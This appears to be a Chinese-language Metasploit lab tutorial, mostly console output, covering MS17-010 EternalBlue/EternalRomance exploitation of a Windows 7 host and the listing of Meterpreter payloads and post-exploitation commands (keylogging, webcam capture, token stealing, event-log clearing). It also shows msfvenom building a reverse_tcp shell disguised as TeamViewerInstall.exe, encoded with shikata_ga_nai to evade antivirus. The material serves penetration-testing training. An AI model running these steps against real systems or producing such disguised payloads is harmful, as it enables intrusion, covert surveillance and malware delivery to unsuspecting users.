Prepending a value with '-' will exclude any matching results. If no options or keywords are provided, cached results are displayed.
OPTIONS: -h Show this help information -o <file> Send output to a file in csv format -S <string> Regex pattern used to filter search results -u Use module if there is one result -s <search_column> Sort the research results based on <search_column> in ascending order -r Reverse the search results order to descending order
Keywords: aka : Modules with a matching AKA (also-known-as) name author : Modules written by this author arch : Modules affecting this architecture bid : Modules with a matching Bugtraq ID cve : Modules with a matching CVE ID edb : Modules with a matching Exploit-DB ID check : Modules that support the 'check' method date : Modules with a matching disclosure date description : Modules with a matching description fullname : Modules with a matching full name mod_time : Modules with a matching modification date name : Modules with a matching descriptive name path : Modules with a matching path platform : Modules affecting this platform port : Modules with a matching port rank : Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400')) ref : Modules with a matching ref reference : Modules with a matching reference target : Modules affecting this target type : Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)
Supported search columns: rank : Sort modules by their exploitabilty rank date : Sort modules by their disclosure date. Alias for disclosure_date disclosure_date : Sort modules by their disclosure date name : Sort modules by their name type : Sort modules by their type check : Sort modules by whether or not they have a check method
Examples: search cve:2009 type:exploit search cve:2009 type:exploit platform:-linux search cve:2009 -s name search type:exploit -s type -r
例如,我们可以尝试查找EternalRomance旧版 Windows 操作系统的漏洞。这可能看起来像这样:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-13 21:38 UTC Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Nmap scan report for 10.10.10.40 Host is up (0.051s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.87 seconds
我们将启动msfconsole并搜索这个确切的漏洞名称。
MSF - 搜索 MS17_010
1 2 3 4 5 6 7 8 9 10 11
msf6 > search ms17_010
Matching Modules ================
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
接下来,我们要为这个场景选择合适的模块。从Nmap扫描中,我们检测到 SMB 服务在版本 上运行Microsoft Windows 7 - 10。通过一些额外的操作系统扫描,我们可以猜测这是一个运行易受攻击的 SMB 实例的 Windows 7。然后我们继续选择模块以index no. 2测试目标是否易受攻击。
Name Current Setting Required Description ---- --------------- -------- ----------- DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wo yes List of named pipes to check rdlists/named_pipes.txt RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework /wiki/Using-Metasploit RPORT 445 yes The Target port (TCP) SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a no rmal read/write folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as
Name: MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution Module: exploit/windows/smb/ms17_010_psexec Platform: Windows Arch: x86, x64 Privileged: No License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2017-03-14
Provided by: sleepya zerosum0x0 Shadow Brokers Equation Group
Available targets: Id Name -- ---- 0 Automatic 1 PowerShell 2 Native upload 3 MOF upload
Check supported: Yes
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wo yes List of named pipes to check rdlists/named_pipes.txt RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/ wiki/Using-Metasploit RPORT 445 yes The Target port (TCP) SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a nor mal read/write folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as
Payload information: Space: 3072
Description: This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.
Name Current Setting Required Description ---- --------------- -------- ----------- DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wo yes List of named pipes to check rdlists/named_pipes.txt RHOSTS 10.10.10.40 yes The target host(s), see https://github.com/rapid7/metasploit-framework /wiki/Using-Metasploit RPORT 445 yes The Target port (TCP) SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a no rmal read/write folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as
Name Current Setting Required Description ---- --------------- -------- ----------- DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wo yes List of named pipes to check rdlists/named_pipes.txt RHOSTS 10.10.10.40 yes The target host(s), see https://github.com/rapid7/metasploit-framework /wiki/Using-Metasploit RPORT 445 yes The Target port (TCP) SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a no rmal read/write folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as
Name Current Setting Required Description ---- --------------- -------- ----------- DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wo yes List of named pipes to check rdlists/named_pipes.txt RHOSTS 10.10.10.40 yes The target host(s), see https://github.com/rapid7/metasploit-framework /wiki/Using-Metasploit RPORT 445 yes The Target port (TCP) SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a no rmal read/write folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as
msf6 exploit(windows/browser/ie_execcommand_uaf) > info
Name: MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability Module: exploit/windows/browser/ie_execcommand_uaf Platform: Windows Arch: Privileged: No License: Metasploit Framework License (BSD) Rank: Good Disclosed: 2012-09-14
Provided by: unknown eromang binjo sinn3r <sinn3r@metasploit.com> juan vazquez <juan.vazquez@metasploit.com>
Available targets: Id Name -- ---- 0 Automatic 1 IE 7 on Windows XP SP3 2 IE 8 on Windows XP SP3 3 IE 7 on Windows Vista 4 IE 8 on Windows Vista 5 IE 8 on Windows 7 6 IE 9 on Windows 7
Check supported: No
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- OBFUSCATE false no Enable JavaScript obfuscation SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random)
Payload information:
Description: This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited since Sep 14, 2012. Also, note that presently, this module has some target dependencies for the ROP chain to be valid. For WinXP SP3 with IE8, msvcrt must be present (as it is by default). For Vista or Win7 with IE8, or Win7 with IE9, JRE 1.6.x or below must be installed (which is often the case).
Name Current Setting Required Description ---- --------------- -------- ----------- OBFUSCATE false no Enable JavaScript obfuscation SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name -- ---- 0 Automatic
msf6 exploit(windows/browser/ie_execcommand_uaf) > show targets
Exploit targets:
Id Name -- ---- 0 Automatic 1 IE 7 on Windows XP SP3 2 IE 8 on Windows XP SP3 3 IE 7 on Windows Vista 4 IE 8 on Windows Vista 5 IE 8 on Windows 7 6 IE 9 on Windows 7
我们看到了不同版本的 Internet Explorer 和各种 Windows 版本的选项。保留选择将Automatic让 msfconsole 知道它需要在发起成功攻击之前对给定目标执行服务检测。
msf6 exploit(windows/browser/ie_execcommand_uaf) > show targets
Exploit targets:
Id Name -- ---- 0 Automatic 1 IE 7 on Windows XP SP3 2 IE 8 on Windows XP SP3 3 IE 7 on Windows Vista 4 IE 8 on Windows Vista 5 IE 8 on Windows 7 6 IE 9 on Windows 7
msf6 exploit(windows/browser/ie_execcommand_uaf) > set target 6
535 windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager 536 windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support 537 windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager 538 windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager 539 windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm) 540 windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64) 541 windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) 542 windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) 543 windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager 544 windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager 545 windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm) 546 windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64) 547 windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp) 548 windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
有效载荷Meterpreter是一种特定类型的多面有效载荷,用于DLL injection确保与受害主机的连接稳定,难以通过简单检查检测到,并在重启或系统更改后保持不变。Meterpreter 完全驻留在远程主机的内存中,不会在硬盘上留下任何痕迹,因此很难用传统的取证技术进行检测。此外,脚本和插件可以loaded and unloaded根据需要动态配置。
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 aix/ppc/shell_bind_tcp manual No AIX Command Shell, Bind TCP Inline 1 aix/ppc/shell_find_port manual No AIX Command Shell, Find Port Inline 2 aix/ppc/shell_interact manual No AIX execve Shell for inetd 3 aix/ppc/shell_reverse_tcp manual No AIX Command Shell, Reverse TCP Inline 4 android/meterpreter/reverse_http manual No Android Meterpreter, Android Reverse HTTP Stager 5 android/meterpreter/reverse_https manual No Android Meterpreter, Android Reverse HTTPS Stager 6 android/meterpreter/reverse_tcp manual No Android Meterpreter, Android Reverse TCP Stager 7 android/meterpreter_reverse_http manual No Android Meterpreter Shell, Reverse HTTP Inline 8 android/meterpreter_reverse_https manual No Android Meterpreter Shell, Reverse HTTPS Inline 9 android/meterpreter_reverse_tcp manual No Android Meterpreter Shell, Reverse TCP Inline 10 android/shell/reverse_http manual No Command Shell, Android Reverse HTTP Stager 11 android/shell/reverse_https manual No Command Shell, Android Reverse HTTPS Stager 12 android/shell/reverse_tcp manual No Command Shell, Android Reverse TCP Stager 13 apple_ios/aarch64/meterpreter_reverse_http manual No Apple_iOS Meterpreter, Reverse HTTP Inline <SNIP> 557 windows/x64/vncinject/reverse_tcp manual No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager 558 windows/x64/vncinject/reverse_tcp_rc4 manual No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) 559 windows/x64/vncinject/reverse_tcp_uuid manual No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64) 560 windows/x64/vncinject/reverse_winhttp manual No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp) 561 windows/x64/vncinject/reverse_winhttps manual No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
如上所示,有很多可用的有效载荷可供选择。不仅如此,我们还可以使用创建我们的有效载荷msfvenom,但我们稍后会深入探讨。我们将使用与以前相同的目标,而不是使用默认的有效载荷,这是一个简单的reverse_tcp_shell,我们将使用一个Meterpreter Payload for Windows 7(x64).
滚动上面的列表,我们找到包含Meterpreter Payloads for Windows(x64).
515 windows/x64/meterpreter/bind_ipv6_tcp manual No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager 516 windows/x64/meterpreter/bind_ipv6_tcp_uuid manual No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support 517 windows/x64/meterpreter/bind_named_pipe manual No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager 518 windows/x64/meterpreter/bind_tcp manual No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager 519 windows/x64/meterpreter/bind_tcp_rc4 manual No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm) 520 windows/x64/meterpreter/bind_tcp_uuid manual No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64) 521 windows/x64/meterpreter/reverse_http manual No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) 522 windows/x64/meterpreter/reverse_https manual No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) 523 windows/x64/meterpreter/reverse_named_pipe manual No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager 524 windows/x64/meterpreter/reverse_tcp manual No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager 525 windows/x64/meterpreter/reverse_tcp_rc4 manual No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm) 526 windows/x64/meterpreter/reverse_tcp_uuid manual No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64) 527 windows/x64/meterpreter/reverse_winhttp manual No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp) 528 windows/x64/meterpreter/reverse_winhttps manual No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp) 529 windows/x64/meterpreter_bind_named_pipe manual No Windows Meterpreter Shell, Bind Named Pipe Inline (x64) 530 windows/x64/meterpreter_bind_tcp manual No Windows Meterpreter Shell, Bind TCP Inline (x64) 531 windows/x64/meterpreter_reverse_http manual No Windows Meterpreter Shell, Reverse HTTP Inline (x64) 532 windows/x64/meterpreter_reverse_https manual No Windows Meterpreter Shell, Reverse HTTPS Inline (x64) 533 windows/x64/meterpreter_reverse_ipv6_tcp manual No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64) 534 windows/x64/meterpreter_reverse_tcp manual No Windows Meterpreter Shell, Reverse TCP Inline x64
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter show payloads
6 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager 7 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support 8 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager 9 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager 10 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm) 11 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64) 12 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) 13 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) 14 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager 15 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager 16 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm) 17 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64) 18 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp) 19 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep -c meterpreter show payloads
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter grep reverse_tcp show payloads
15 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager 16 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm) 17 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64) msf6 exploit(windows/smb/ms17_010_eternalblue) > grep -c meterpreter grep reverse_tcp show payloads
Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter grep reverse_tcp show payloads
15 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager 16 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm) 17 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 15
Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Command Description ------- ----------- ? Help menu background 当前会话的背景 bg Alias for background bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel disable_unicode_encoding Disables encoding of Unicode strings enable_unicode_encoding Enables encoding of Unicode strings exit Terminate the meterpreter session get_timeouts Get the current session timeout values guid Get the session GUID help Help menu info Displays information about a Post module IRB Open an interactive Ruby shell on the current session load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session migrate Migrate the server to another process pivot Manage pivot listeners pry Open the Pry debugger on the current session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module secure (Re)Negotiate TLV packet encryption on the session sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channel
Strap: File system Commands ============================
Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory checksum Retrieve the checksum of a file cp Copy source to destination dir List files (alias for ls) download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory LCD Change local working directory lls List local files lpwd Print local working directory ls List files mkdir Make directory mv Move source to destination PWD Print working directory rm Delete the specified file rmdir Remove directory search Search for files show_mount List all mount points/logical drives upload Upload a file or directory
Command Description ------- ----------- arp Display the host ARP cache get proxy Display the current proxy configuration ifconfig Display interfaces ipconfig Display interfaces netstat Display the network connections portfwd Forward a local port to a remote service resolve Resolve a set of hostnames on the target route View and modify the routing table
Strap: System Commands =======================
Command Description ------- ----------- clearev Clear the event log drop_token Relinquishes any active impersonation token. execute Execute a command getenv Get one or more environment variable values getpid Get the current process identifier getprivs Attempt to enable all privileges available to the current process getsid Get the SID of the user that the server is running as getuid Get the user that the server is running as kill Terminate a process localtime Displays the target system's local date and time pgrep Filter processes by name pkill Terminate processes by name ps List running processes reboot Reboots the remote computer reg Modify and interact with the remote registry rev2self Calls RevertToSelf() on the remote machine shell Drop into a system command shell shutdown Shuts down the remote computer steal_token Attempts to steal an impersonation token from the target process suspend Suspends or resumes a list of processes sysinfo Gets information about the remote system, such as OS
Strap: User interface Commands ===============================
Command Description ------- ----------- enumdesktops List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idle time Returns the number of seconds the remote user has been idle keyboard_send Send keystrokes keyevent Send key events keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes mouse Send mouse events screenshare Watch the remote user's desktop in real-time screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop uictl Control some of the user interface components
Stdapi: Webcam Commands =======================
Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_stream Play a video stream from the specified webcam
Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 8192 dir 2017-07-21 06:56:23 +0000 Administrator 40777/rwxrwxrwx 0 dir 2009-07-14 05:08:56 +0000 All Users 40555/r-xr-xr-x 8192 dir 2009-07-14 03:20:08 +0000 Default 40777/rwxrwxrwx 0 dir 2009-07-14 05:08:56 +0000 Default User 40555/r-xr-xr-x 4096 dir 2009-07-14 03:20:08 +0000 Public 100666/rw-rw-rw- 174 fil 2009-07-14 04:54:24 +0000 desktop.ini 40777/rwxrwxrwx 8192 dir 2017-07-14 13:45:33 +0000 haris
meterpreter > shell
Process 2664 created. Channel 1 created.
Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
bad characters还需要它们从有效负载中删除已知的十六进制操作码。不仅如此,以不同格式编码有效载荷也有助于如上所述的反病毒检测。然而,随着 IPS/IDS 制造商改进了他们的保护软件处理恶意软件和病毒签名的方式,严格用于 AV 规避的编码器的使用随着时间的推移已经减少。
Shikata Ga Nai ( SGN) 是当今最常用的编码方案之一,因为它很难检测到通过其机制编码的有效载荷不再普遍无法检测到。离得很远。名称 ( 仕方がない) 的意思是It cannot be helpedor Nothing can be done about it,如果我们几年前读到这篇文章的话,这是理所当然的。但是,我们将探索其他方法来规避保护系统。来自 FireEye 的这篇文章详细介绍了 Shikata Ga Nai 之前统治其他编码器的原因和方式。
vnswer77@htb[/htb]$ msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl
Found 11 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 381 (iteration=0) x86/shikata_ga_nai chosen with final size 381 Payload size: 381 bytes Final size of perl file: 1674 bytes my $buf = "\xda\xc1\xba\x37\xc7\xcb\x5e\xd9\x74\x24\xf4\x5b\x2b\xc9" . "\xb1\x59\x83\xeb\xfc\x31\x53\x15\x03\x53\x15\xd5\x32\x37" . "\xb6\x96\xbd\xc8\x47\xc8\x8c\x1a\x23\x83\xbd\xaa\x27\xc1" . "\x4d\x42\xd2\x6e\x1f\x40\x2c\x8f\x2b\x1a\x66\x60\x9b\x91" . "\x50\x4f\x23\x89\xa1\xce\xdf\xd0\xf5\x30\xe1\x1a\x08\x31" .
vnswer77@htb[/htb]$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -o ./TeamViewerInstall.exe
Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai chosen with final size 368 Payload size: 368 bytes Final size of exe file: 73802 bytes Saved as: TeamViewerInstall.exe
这将生成一个exe格式为 TeamViewerInstall.exe 的有效负载,该格式适用于 Windows 平台的 x86 架构处理器,具有隐藏的 Meterpreter reverse_tcp shell 有效负载,使用 Shikata Ga Nai 方案编码一次。让我们把结果上传到 VirusTotal。
一个更好的选择是尝试通过相同编码方案的多次迭代来运行它:
Shikata Ga Nai编码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
vnswer77@htb[/htb]$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe
Found 1 compatible encoders Attempting to encode payload with 10 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai succeeded with size 395 (iteration=1) x86/shikata_ga_nai succeeded with size 422 (iteration=2) x86/shikata_ga_nai succeeded with size 449 (iteration=3) x86/shikata_ga_nai succeeded with size 476 (iteration=4) x86/shikata_ga_nai succeeded with size 503 (iteration=5) x86/shikata_ga_nai succeeded with size 530 (iteration=6) x86/shikata_ga_nai succeeded with size 557 (iteration=7) x86/shikata_ga_nai succeeded with size 584 (iteration=8) x86/shikata_ga_nai succeeded with size 611 (iteration=9) x86/shikata_ga_nai chosen with final size 611 Payload size: 611 bytes Final size of exe file: 73802 bytes Error: Permission denied @ rb_sysopen - /root/Desktop/TeamViewerInstall.exe
正如我们所看到的,这仍然不足以进行 AV 规避。仍有大量产品可以检测有效负载。或者,Metasploit 提供了一个工具msf-virustotal,我们可以使用它和 API 密钥来分析我们的有效载荷。但是,这需要在 VirusTotal 上免费注册。
